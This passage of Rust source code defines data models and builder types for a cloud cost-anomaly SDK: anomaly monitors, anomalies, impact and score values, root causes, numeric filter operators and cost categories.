        pub fn set_dimensional_value_count(mut self, input: std::option::Option<i32>) -> Self {
            self.dimensional_value_count = input;
            self
        }
        /// Consumes the builder and constructs a [`AnomalyMonitor`](crate::model::AnomalyMonitor).
        /// An unset `dimensional_value_count` defaults to `0`.
        pub fn build(self) -> crate::model::AnomalyMonitor {
            crate::model::AnomalyMonitor {
                monitor_arn: self.monitor_arn,
                monitor_name: self.monitor_name,
                creation_date: self.creation_date,
                last_updated_date: self.last_updated_date,
                last_evaluated_date: self.last_evaluated_date,
                monitor_type: self.monitor_type,
                monitor_dimension: self.monitor_dimension,
                monitor_specification: self.monitor_specification,
                dimensional_value_count: self.dimensional_value_count.unwrap_or_default(),
            }
        }
    }
}
impl AnomalyMonitor {
    /// Creates a new builder-style object to manufacture [`AnomalyMonitor`](crate::model::AnomalyMonitor)
    pub fn builder() -> crate::model::anomaly_monitor::Builder {
        // Delegates to the builder's derived `Default` implementation.
        std::default::Default::default()
    }
}
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum MonitorDimension {
    Service,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for MonitorDimension {
    /// Maps a wire-format string to a variant; unrecognized values become `Unknown`.
    fn from(s: &str) -> Self {
        if s == "SERVICE" {
            MonitorDimension::Service
        } else {
            MonitorDimension::Unknown(s.to_owned())
        }
    }
}
impl std::str::FromStr for MonitorDimension {
    type Err = std::convert::Infallible;
    /// Parsing never fails; it reuses the infallible `From<&str>` conversion.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        std::result::Result::Ok(s.into())
    }
}
impl MonitorDimension {
    /// Returns the wire-format string for this variant.
    pub fn as_str(&self) -> &str {
        if let MonitorDimension::Unknown(s) = self {
            s.as_ref()
        } else {
            "SERVICE"
        }
    }
    /// Returns all wire-format values known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &["SERVICE"]
    }
}
impl AsRef<str> for MonitorDimension {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum MonitorType {
    Custom,
    Dimensional,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for MonitorType {
    /// Maps a wire-format string to a variant; unrecognized values become `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "CUSTOM" => Self::Custom,
            "DIMENSIONAL" => Self::Dimensional,
            other => Self::Unknown(other.to_owned()),
        }
    }
}
impl std::str::FromStr for MonitorType {
    type Err = std::convert::Infallible;
    /// Parsing never fails; it reuses the infallible `From<&str>` conversion.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        std::result::Result::Ok(s.into())
    }
}
impl MonitorType {
    /// Returns the wire-format string for this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::Custom => "CUSTOM",
            Self::Dimensional => "DIMENSIONAL",
            Self::Unknown(s) => s.as_ref(),
        }
    }
    /// Returns all wire-format values known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &["CUSTOM", "DIMENSIONAL"]
    }
}
impl AsRef<str> for MonitorType {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>An unusual cost pattern. This consists of the detailed metadata and the current status
/// of the anomaly object. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Anomaly {
    /// <p>The unique identifier for the anomaly. </p>
    pub anomaly_id: std::option::Option<std::string::String>,
    /// <p>The first day the anomaly is detected. </p>
    pub anomaly_start_date: std::option::Option<std::string::String>,
    /// <p>The last day the anomaly is detected. </p>
    pub anomaly_end_date: std::option::Option<std::string::String>,
    /// <p>The dimension for the anomaly (for example, an Amazon Web Services service in a service
    /// monitor). </p>
    pub dimension_value: std::option::Option<std::string::String>,
    /// <p>The list of identified root causes for the anomaly. </p>
    pub root_causes: std::option::Option<std::vec::Vec<crate::model::RootCause>>,
    /// <p>The latest and maximum score for the anomaly. </p>
    pub anomaly_score: std::option::Option<crate::model::AnomalyScore>,
    /// <p>The dollar impact for the anomaly. </p>
    pub impact: std::option::Option<crate::model::Impact>,
    /// <p>The Amazon Resource Name (ARN) for the cost monitor that generated this anomaly.
    /// </p>
    pub monitor_arn: std::option::Option<std::string::String>,
    /// <p>The feedback value. </p>
    pub feedback: std::option::Option<crate::model::AnomalyFeedbackType>,
}
impl std::fmt::Debug for Anomaly {
    /// Renders every field through the standard `Formatter::debug_struct` builder.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("Anomaly")
            .field("anomaly_id", &self.anomaly_id)
            .field("anomaly_start_date", &self.anomaly_start_date)
            .field("anomaly_end_date", &self.anomaly_end_date)
            .field("dimension_value", &self.dimension_value)
            .field("root_causes", &self.root_causes)
            .field("anomaly_score", &self.anomaly_score)
            .field("impact", &self.impact)
            .field("monitor_arn", &self.monitor_arn)
            .field("feedback", &self.feedback)
            .finish()
    }
}
/// See [`Anomaly`](crate::model::Anomaly)
pub mod anomaly {
    /// A builder for [`Anomaly`](crate::model::Anomaly)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) anomaly_id: std::option::Option<std::string::String>,
        pub(crate) anomaly_start_date: std::option::Option<std::string::String>,
        pub(crate) anomaly_end_date: std::option::Option<std::string::String>,
        pub(crate) dimension_value: std::option::Option<std::string::String>,
        pub(crate) root_causes: std::option::Option<std::vec::Vec<crate::model::RootCause>>,
        pub(crate) anomaly_score: std::option::Option<crate::model::AnomalyScore>,
        pub(crate) impact: std::option::Option<crate::model::Impact>,
        pub(crate) monitor_arn: std::option::Option<std::string::String>,
        pub(crate) feedback: std::option::Option<crate::model::AnomalyFeedbackType>,
    }
    impl Builder {
        /// Sets the unique identifier for the anomaly.
        pub fn anomaly_id(self, input: impl Into<std::string::String>) -> Self {
            self.set_anomaly_id(Some(input.into()))
        }
        /// Sets or clears the unique identifier for the anomaly.
        pub fn set_anomaly_id(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.anomaly_id = input;
            self
        }
        /// Sets the first day the anomaly is detected.
        pub fn anomaly_start_date(self, input: impl Into<std::string::String>) -> Self {
            self.set_anomaly_start_date(Some(input.into()))
        }
        /// Sets or clears the first day the anomaly is detected.
        pub fn set_anomaly_start_date(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.anomaly_start_date = input;
            self
        }
        /// Sets the last day the anomaly is detected.
        pub fn anomaly_end_date(self, input: impl Into<std::string::String>) -> Self {
            self.set_anomaly_end_date(Some(input.into()))
        }
        /// Sets or clears the last day the anomaly is detected.
        pub fn set_anomaly_end_date(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.anomaly_end_date = input;
            self
        }
        /// Sets the dimension for the anomaly (for example, an Amazon Web Services
        /// service in a service monitor).
        pub fn dimension_value(self, input: impl Into<std::string::String>) -> Self {
            self.set_dimension_value(Some(input.into()))
        }
        /// Sets or clears the dimension for the anomaly.
        pub fn set_dimension_value(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.dimension_value = input;
            self
        }
        /// Appends a single root cause to `root_causes`, creating the list on first use.
        pub fn root_causes(mut self, input: impl Into<crate::model::RootCause>) -> Self {
            self.root_causes
                .get_or_insert_with(std::vec::Vec::new)
                .push(input.into());
            self
        }
        /// Replaces (or clears) the whole `root_causes` list.
        pub fn set_root_causes(
            mut self,
            input: std::option::Option<std::vec::Vec<crate::model::RootCause>>,
        ) -> Self {
            self.root_causes = input;
            self
        }
        /// Sets the latest and maximum score for the anomaly.
        pub fn anomaly_score(self, input: crate::model::AnomalyScore) -> Self {
            self.set_anomaly_score(Some(input))
        }
        /// Sets or clears the latest and maximum score for the anomaly.
        pub fn set_anomaly_score(
            mut self,
            input: std::option::Option<crate::model::AnomalyScore>,
        ) -> Self {
            self.anomaly_score = input;
            self
        }
        /// Sets the dollar impact for the anomaly.
        pub fn impact(self, input: crate::model::Impact) -> Self {
            self.set_impact(Some(input))
        }
        /// Sets or clears the dollar impact for the anomaly.
        pub fn set_impact(mut self, input: std::option::Option<crate::model::Impact>) -> Self {
            self.impact = input;
            self
        }
        /// Sets the Amazon Resource Name (ARN) for the cost monitor that generated this anomaly.
        pub fn monitor_arn(self, input: impl Into<std::string::String>) -> Self {
            self.set_monitor_arn(Some(input.into()))
        }
        /// Sets or clears the monitor ARN.
        pub fn set_monitor_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.monitor_arn = input;
            self
        }
        /// Sets the feedback value.
        pub fn feedback(self, input: crate::model::AnomalyFeedbackType) -> Self {
            self.set_feedback(Some(input))
        }
        /// Sets or clears the feedback value.
        pub fn set_feedback(
            mut self,
            input: std::option::Option<crate::model::AnomalyFeedbackType>,
        ) -> Self {
            self.feedback = input;
            self
        }
        /// Consumes the builder and constructs a [`Anomaly`](crate::model::Anomaly)
        pub fn build(self) -> crate::model::Anomaly {
            crate::model::Anomaly {
                anomaly_id: self.anomaly_id,
                anomaly_start_date: self.anomaly_start_date,
                anomaly_end_date: self.anomaly_end_date,
                dimension_value: self.dimension_value,
                root_causes: self.root_causes,
                anomaly_score: self.anomaly_score,
                impact: self.impact,
                monitor_arn: self.monitor_arn,
                feedback: self.feedback,
            }
        }
    }
}
impl Anomaly {
    /// Creates a new builder-style object to manufacture [`Anomaly`](crate::model::Anomaly)
    pub fn builder() -> crate::model::anomaly::Builder {
        // Delegates to the builder's derived `Default` implementation.
        std::default::Default::default()
    }
}
/// <p>The dollar value of the anomaly. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct Impact {
    /// <p>The maximum dollar value that's observed for an anomaly. </p>
    pub max_impact: f64,
    /// <p>The cumulative dollar value that's observed for an anomaly. </p>
    pub total_impact: f64,
}
impl std::fmt::Debug for Impact {
    /// Renders every field through the standard `Formatter::debug_struct` builder.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("Impact")
            .field("max_impact", &self.max_impact)
            .field("total_impact", &self.total_impact)
            .finish()
    }
}
/// See [`Impact`](crate::model::Impact)
pub mod impact {
    /// A builder for [`Impact`](crate::model::Impact)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) max_impact: std::option::Option<f64>,
        pub(crate) total_impact: std::option::Option<f64>,
    }
    impl Builder {
        /// Sets the maximum dollar value that's observed for an anomaly.
        pub fn max_impact(self, input: f64) -> Self {
            self.set_max_impact(Some(input))
        }
        /// Sets or clears the maximum dollar value that's observed for an anomaly.
        pub fn set_max_impact(mut self, input: std::option::Option<f64>) -> Self {
            self.max_impact = input;
            self
        }
        /// Sets the cumulative dollar value that's observed for an anomaly.
        pub fn total_impact(self, input: f64) -> Self {
            self.set_total_impact(Some(input))
        }
        /// Sets or clears the cumulative dollar value that's observed for an anomaly.
        pub fn set_total_impact(mut self, input: std::option::Option<f64>) -> Self {
            self.total_impact = input;
            self
        }
        /// Consumes the builder and constructs a [`Impact`](crate::model::Impact).
        /// Unset values default to `0.0`.
        pub fn build(self) -> crate::model::Impact {
            crate::model::Impact {
                max_impact: self.max_impact.unwrap_or_default(),
                total_impact: self.total_impact.unwrap_or_default(),
            }
        }
    }
}
impl Impact {
    /// Creates a new builder-style object to manufacture [`Impact`](crate::model::Impact)
    pub fn builder() -> crate::model::impact::Builder {
        // Delegates to the builder's derived `Default` implementation.
        std::default::Default::default()
    }
}
/// <p>Quantifies the anomaly. The higher score means that it's more anomalous. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct AnomalyScore {
    /// <p>The maximum score that's observed during the <code>AnomalyDateInterval</code>. </p>
    pub max_score: f64,
    /// <p>The last observed score. </p>
    pub current_score: f64,
}
impl std::fmt::Debug for AnomalyScore {
    /// Renders every field through the standard `Formatter::debug_struct` builder.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("AnomalyScore")
            .field("max_score", &self.max_score)
            .field("current_score", &self.current_score)
            .finish()
    }
}
/// See [`AnomalyScore`](crate::model::AnomalyScore)
pub mod anomaly_score {
    /// A builder for [`AnomalyScore`](crate::model::AnomalyScore)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) max_score: std::option::Option<f64>,
        pub(crate) current_score: std::option::Option<f64>,
    }
    impl Builder {
        /// Sets the maximum score that's observed during the `AnomalyDateInterval`.
        pub fn max_score(self, input: f64) -> Self {
            self.set_max_score(Some(input))
        }
        /// Sets or clears the maximum score observed during the `AnomalyDateInterval`.
        pub fn set_max_score(mut self, input: std::option::Option<f64>) -> Self {
            self.max_score = input;
            self
        }
        /// Sets the last observed score.
        pub fn current_score(self, input: f64) -> Self {
            self.set_current_score(Some(input))
        }
        /// Sets or clears the last observed score.
        pub fn set_current_score(mut self, input: std::option::Option<f64>) -> Self {
            self.current_score = input;
            self
        }
        /// Consumes the builder and constructs a [`AnomalyScore`](crate::model::AnomalyScore).
        /// Unset values default to `0.0`.
        pub fn build(self) -> crate::model::AnomalyScore {
            crate::model::AnomalyScore {
                max_score: self.max_score.unwrap_or_default(),
                current_score: self.current_score.unwrap_or_default(),
            }
        }
    }
}
impl AnomalyScore {
    /// Creates a new builder-style object to manufacture [`AnomalyScore`](crate::model::AnomalyScore)
    pub fn builder() -> crate::model::anomaly_score::Builder {
        // Delegates to the builder's derived `Default` implementation.
        std::default::Default::default()
    }
}
/// <p>The combination of Amazon Web Services service, linked account, Region, and usage type
/// where a cost anomaly is observed. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RootCause {
    /// <p>The Amazon Web Services service name that's associated with the cost anomaly. </p>
    pub service: std::option::Option<std::string::String>,
    /// <p>The Amazon Web Services Region that's associated with the cost anomaly. </p>
    pub region: std::option::Option<std::string::String>,
    /// <p>The member account value that's associated with the cost anomaly. </p>
    pub linked_account: std::option::Option<std::string::String>,
    /// <p>The <code>UsageType</code> value that's associated with the cost anomaly. </p>
    pub usage_type: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for RootCause {
    /// Renders every field through the standard `Formatter::debug_struct` builder.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("RootCause")
            .field("service", &self.service)
            .field("region", &self.region)
            .field("linked_account", &self.linked_account)
            .field("usage_type", &self.usage_type)
            .finish()
    }
}
/// See [`RootCause`](crate::model::RootCause)
pub mod root_cause {
    /// A builder for [`RootCause`](crate::model::RootCause)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) service: std::option::Option<std::string::String>,
        pub(crate) region: std::option::Option<std::string::String>,
        pub(crate) linked_account: std::option::Option<std::string::String>,
        pub(crate) usage_type: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// Sets the Amazon Web Services service name that's associated with the cost anomaly.
        pub fn service(self, input: impl Into<std::string::String>) -> Self {
            self.set_service(Some(input.into()))
        }
        /// Sets or clears the associated Amazon Web Services service name.
        pub fn set_service(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.service = input;
            self
        }
        /// Sets the Amazon Web Services Region that's associated with the cost anomaly.
        pub fn region(self, input: impl Into<std::string::String>) -> Self {
            self.set_region(Some(input.into()))
        }
        /// Sets or clears the associated Amazon Web Services Region.
        pub fn set_region(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.region = input;
            self
        }
        /// Sets the member account value that's associated with the cost anomaly.
        pub fn linked_account(self, input: impl Into<std::string::String>) -> Self {
            self.set_linked_account(Some(input.into()))
        }
        /// Sets or clears the associated member account value.
        pub fn set_linked_account(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.linked_account = input;
            self
        }
        /// Sets the `UsageType` value that's associated with the cost anomaly.
        pub fn usage_type(self, input: impl Into<std::string::String>) -> Self {
            self.set_usage_type(Some(input.into()))
        }
        /// Sets or clears the associated `UsageType` value.
        pub fn set_usage_type(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.usage_type = input;
            self
        }
        /// Consumes the builder and constructs a [`RootCause`](crate::model::RootCause)
        pub fn build(self) -> crate::model::RootCause {
            crate::model::RootCause {
                service: self.service,
                region: self.region,
                linked_account: self.linked_account,
                usage_type: self.usage_type,
            }
        }
    }
}
impl RootCause {
    /// Creates a new builder-style object to manufacture [`RootCause`](crate::model::RootCause)
    pub fn builder() -> crate::model::root_cause::Builder {
        // Delegates to the builder's derived `Default` implementation.
        std::default::Default::default()
    }
}
/// <p>Filters cost anomalies based on the total impact. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct TotalImpactFilter {
    /// <p>The comparing value that's used in the filter. </p>
    pub numeric_operator: std::option::Option<crate::model::NumericOperator>,
    /// <p>The lower bound dollar value that's used in the filter. </p>
    pub start_value: f64,
    /// <p>The upper bound dollar value that's used in the filter. </p>
    pub end_value: f64,
}
impl std::fmt::Debug for TotalImpactFilter {
    /// Renders every field through the standard `Formatter::debug_struct` builder.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("TotalImpactFilter")
            .field("numeric_operator", &self.numeric_operator)
            .field("start_value", &self.start_value)
            .field("end_value", &self.end_value)
            .finish()
    }
}
/// See [`TotalImpactFilter`](crate::model::TotalImpactFilter)
pub mod total_impact_filter {
    /// A builder for [`TotalImpactFilter`](crate::model::TotalImpactFilter)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) numeric_operator: std::option::Option<crate::model::NumericOperator>,
        pub(crate) start_value: std::option::Option<f64>,
        pub(crate) end_value: std::option::Option<f64>,
    }
    impl Builder {
        /// Sets the comparing value that's used in the filter.
        pub fn numeric_operator(self, input: crate::model::NumericOperator) -> Self {
            self.set_numeric_operator(Some(input))
        }
        /// Sets or clears the comparing value that's used in the filter.
        pub fn set_numeric_operator(
            mut self,
            input: std::option::Option<crate::model::NumericOperator>,
        ) -> Self {
            self.numeric_operator = input;
            self
        }
        /// Sets the lower bound dollar value that's used in the filter.
        pub fn start_value(self, input: f64) -> Self {
            self.set_start_value(Some(input))
        }
        /// Sets or clears the lower bound dollar value that's used in the filter.
        pub fn set_start_value(mut self, input: std::option::Option<f64>) -> Self {
            self.start_value = input;
            self
        }
        /// Sets the upper bound dollar value that's used in the filter.
        pub fn end_value(self, input: f64) -> Self {
            self.set_end_value(Some(input))
        }
        /// Sets or clears the upper bound dollar value that's used in the filter.
        pub fn set_end_value(mut self, input: std::option::Option<f64>) -> Self {
            self.end_value = input;
            self
        }
        /// Consumes the builder and constructs a [`TotalImpactFilter`](crate::model::TotalImpactFilter).
        /// Unset bounds default to `0.0`.
        pub fn build(self) -> crate::model::TotalImpactFilter {
            crate::model::TotalImpactFilter {
                numeric_operator: self.numeric_operator,
                start_value: self.start_value.unwrap_or_default(),
                end_value: self.end_value.unwrap_or_default(),
            }
        }
    }
}
impl TotalImpactFilter {
    /// Creates a new builder-style object to manufacture [`TotalImpactFilter`](crate::model::TotalImpactFilter)
    pub fn builder() -> crate::model::total_impact_filter::Builder {
        // Delegates to the builder's derived `Default` implementation.
        std::default::Default::default()
    }
}
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum NumericOperator {
    Between,
    Equal,
    GreaterThan,
    GreaterThanOrEqual,
    LessThan,
    LessThanOrEqual,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for NumericOperator {
    /// Maps a wire-format string to a variant; unrecognized values become `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "BETWEEN" => Self::Between,
            "EQUAL" => Self::Equal,
            "GREATER_THAN" => Self::GreaterThan,
            "GREATER_THAN_OR_EQUAL" => Self::GreaterThanOrEqual,
            "LESS_THAN" => Self::LessThan,
            "LESS_THAN_OR_EQUAL" => Self::LessThanOrEqual,
            other => Self::Unknown(other.to_owned()),
        }
    }
}
impl std::str::FromStr for NumericOperator {
    type Err = std::convert::Infallible;
    /// Parsing never fails; it reuses the infallible `From<&str>` conversion.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        std::result::Result::Ok(s.into())
    }
}
impl NumericOperator {
    /// Returns the wire-format string for this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::Between => "BETWEEN",
            Self::Equal => "EQUAL",
            Self::GreaterThan => "GREATER_THAN",
            Self::GreaterThanOrEqual => "GREATER_THAN_OR_EQUAL",
            Self::LessThan => "LESS_THAN",
            Self::LessThanOrEqual => "LESS_THAN_OR_EQUAL",
            Self::Unknown(s) => s.as_ref(),
        }
    }
    /// Returns all wire-format values known at code-generation time.
    pub fn values() -> &'static [&'static str] {
        &[
            "BETWEEN",
            "EQUAL",
            "GREATER_THAN",
            "GREATER_THAN_OR_EQUAL",
            "LESS_THAN",
            "LESS_THAN_OR_EQUAL",
        ]
    }
}
impl AsRef<str> for NumericOperator {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>The time period for an anomaly. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct AnomalyDateInterval {
    /// <p>The first date an anomaly was observed. </p>
    pub start_date: std::option::Option<std::string::String>,
    /// <p>The last date an anomaly was observed. </p>
    pub end_date: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for AnomalyDateInterval {
    /// Renders every field through the standard `Formatter::debug_struct` builder.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("AnomalyDateInterval")
            .field("start_date", &self.start_date)
            .field("end_date", &self.end_date)
            .finish()
    }
}
/// See [`AnomalyDateInterval`](crate::model::AnomalyDateInterval)
pub mod anomaly_date_interval {
    /// A builder for [`AnomalyDateInterval`](crate::model::AnomalyDateInterval)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) start_date: std::option::Option<std::string::String>,
        pub(crate) end_date: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// Sets the first date an anomaly was observed.
        pub fn start_date(self, input: impl Into<std::string::String>) -> Self {
            self.set_start_date(Some(input.into()))
        }
        /// Sets or clears the first date an anomaly was observed.
        pub fn set_start_date(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.start_date = input;
            self
        }
        /// Sets the last date an anomaly was observed.
        pub fn end_date(self, input: impl Into<std::string::String>) -> Self {
            self.set_end_date(Some(input.into()))
        }
        /// Sets or clears the last date an anomaly was observed.
        pub fn set_end_date(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.end_date = input;
            self
        }
        /// Consumes the builder and constructs a [`AnomalyDateInterval`](crate::model::AnomalyDateInterval)
        pub fn build(self) -> crate::model::AnomalyDateInterval {
            crate::model::AnomalyDateInterval {
                start_date: self.start_date,
                end_date: self.end_date,
            }
        }
    }
}
impl AnomalyDateInterval {
    /// Creates a new builder-style object to manufacture [`AnomalyDateInterval`](crate::model::AnomalyDateInterval)
    pub fn builder() -> crate::model::anomaly_date_interval::Builder {
        // Delegates to the builder's derived `Default` implementation.
        std::default::Default::default()
    }
}
/// <p>The structure of Cost Categories. This includes detailed metadata and the set of rules
/// for the <code>CostCategory</code> object.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct CostCategory {
    /// <p>The unique identifier for your Cost Category. </p>
    pub cost_category_arn: std::option::Option<std::string::String>,
    /// <p>The effective start date of your Cost Category.</p>
    pub effective_start: std::option::Option<std::string::String>,
    /// <p> The effective end date of your Cost Category.</p>
    pub effective_end: std::option::Option<std::string::String>,
    /// <p>The unique name of the Cost Category.</p>
    pub name: std::option::Option<std::string::String>,
    /// <p>The rule schema version in this particular Cost Category.</p>
    pub rule_version: std::option::Option<crate::model::CostCategoryRuleVersion>,
    /// <p>The rules are processed in order. If there are multiple rules that match the line
    /// item, then the first rule to match is used to determine that Cost Category value.
    /// </p>
    pub rules: std::option::Option<std::vec::Vec<crate::model::CostCategoryRule>>,
    /// <p> The split charge rules that are used to allocate your charges between your Cost
    /// Category values. </p>
    pub split_charge_rules:
        std::option::Option<std::vec::Vec<crate::model::CostCategorySplitChargeRule>>,
    /// <p>The list of processing statuses for Cost Management products for a specific cost
    /// category. </p>
    pub processing_status:
        std::option::Option<std::vec::Vec<crate::model::CostCategoryProcessingStatus>>,
    /// <p>The
    /// default value for the cost category.</p>
    pub default_value: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for CostCategory {
    // Hand-written Debug mirroring the derive: the struct name followed by
    // every field in declaration order.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("CostCategory")
            .field("cost_category_arn", &self.cost_category_arn)
            .field("effective_start", &self.effective_start)
            .field("effective_end", &self.effective_end)
            .field("name", &self.name)
            .field("rule_version", &self.rule_version)
            .field("rules", &self.rules)
            .field("split_charge_rules", &self.split_charge_rules)
            .field("processing_status", &self.processing_status)
            .field("default_value", &self.default_value)
            .finish()
    }
}
/// See [`CostCategory`](crate::model::CostCategory)
pub mod cost_category {
    /// A builder for [`CostCategory`](crate::model::CostCategory)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) cost_category_arn: std::option::Option<std::string::String>,
        pub(crate) effective_start: std::option::Option<std::string::String>,
        pub(crate) effective_end: std::option::Option<std::string::String>,
        pub(crate) name: std::option::Option<std::string::String>,
        pub(crate) rule_version: std::option::Option<crate::model::CostCategoryRuleVersion>,
        pub(crate) rules: std::option::Option<std::vec::Vec<crate::model::CostCategoryRule>>,
        pub(crate) split_charge_rules:
            std::option::Option<std::vec::Vec<crate::model::CostCategorySplitChargeRule>>,
        pub(crate) processing_status:
            std::option::Option<std::vec::Vec<crate::model::CostCategoryProcessingStatus>>,
        pub(crate) default_value: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The unique identifier for your Cost Category. </p>
        pub fn cost_category_arn(mut self, input: impl Into<std::string::String>) -> Self {
            self.cost_category_arn = Some(input.into());
            self
        }
        /// Sets [`cost_category_arn`](Self::cost_category_arn), replacing any stored value.
        pub fn set_cost_category_arn(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.cost_category_arn = input;
            self
        }
        /// <p>The effective start date of your Cost Category.</p>
        pub fn effective_start(mut self, input: impl Into<std::string::String>) -> Self {
            self.effective_start = Some(input.into());
            self
        }
        /// Sets [`effective_start`](Self::effective_start), replacing any stored value.
        pub fn set_effective_start(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.effective_start = input;
            self
        }
        /// <p> The effective end date of your Cost Category.</p>
        pub fn effective_end(mut self, input: impl Into<std::string::String>) -> Self {
            self.effective_end = Some(input.into());
            self
        }
        /// Sets [`effective_end`](Self::effective_end), replacing any stored value.
        pub fn set_effective_end(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.effective_end = input;
            self
        }
        /// <p>The unique name of the Cost Category.</p>
        pub fn name(mut self, input: impl Into<std::string::String>) -> Self {
            self.name = Some(input.into());
            self
        }
        /// Sets [`name`](Self::name), replacing any stored value.
        pub fn set_name(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.name = input;
            self
        }
        /// <p>The rule schema version in this particular Cost Category.</p>
        pub fn rule_version(mut self, input: crate::model::CostCategoryRuleVersion) -> Self {
            self.rule_version = Some(input);
            self
        }
        /// Sets [`rule_version`](Self::rule_version), replacing any stored value.
        pub fn set_rule_version(
            mut self,
            input: std::option::Option<crate::model::CostCategoryRuleVersion>,
        ) -> Self {
            self.rule_version = input;
            self
        }
        /// Appends a single rule to [`rules`](Self::rules); call repeatedly to add several.
        pub fn rules(mut self, input: impl Into<crate::model::CostCategoryRule>) -> Self {
            let mut v = self.rules.unwrap_or_default();
            v.push(input.into());
            self.rules = Some(v);
            self
        }
        /// Replaces the whole [`rules`](Self::rules) collection.
        pub fn set_rules(
            mut self,
            input: std::option::Option<std::vec::Vec<crate::model::CostCategoryRule>>,
        ) -> Self {
            self.rules = input;
            self
        }
        /// Appends one rule to [`split_charge_rules`](Self::split_charge_rules).
        pub fn split_charge_rules(
            mut self,
            input: impl Into<crate::model::CostCategorySplitChargeRule>,
        ) -> Self {
            let mut v = self.split_charge_rules.unwrap_or_default();
            v.push(input.into());
            self.split_charge_rules = Some(v);
            self
        }
        /// Replaces the whole [`split_charge_rules`](Self::split_charge_rules) collection.
        pub fn set_split_charge_rules(
            mut self,
            input: std::option::Option<std::vec::Vec<crate::model::CostCategorySplitChargeRule>>,
        ) -> Self {
            self.split_charge_rules = input;
            self
        }
        /// Appends one entry to [`processing_status`](Self::processing_status).
        pub fn processing_status(
            mut self,
            input: impl Into<crate::model::CostCategoryProcessingStatus>,
        ) -> Self {
